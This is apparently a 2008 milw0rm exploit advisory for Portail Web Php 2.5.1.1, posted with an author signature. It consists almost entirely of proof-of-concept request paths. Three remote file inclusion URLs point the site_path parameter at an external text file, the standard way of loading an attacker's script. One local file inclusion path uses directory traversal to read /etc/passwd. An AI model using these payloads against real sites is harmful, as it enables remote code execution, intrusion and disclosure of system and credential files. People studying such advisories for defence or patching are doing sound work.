### Portail Web Php <= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities ### http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar ### POC : ### I- Remote File Inclusion ### /PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt ### /PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt ### /PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt ### II- Local File Inclusion ### /PwP2.5.1.1/?page=../../../../../../../../etc/passwd ### I'm Tryagi - Tryag.Cc/cc - Mahmood_ali :) # milw0rm.com [2008-02-24]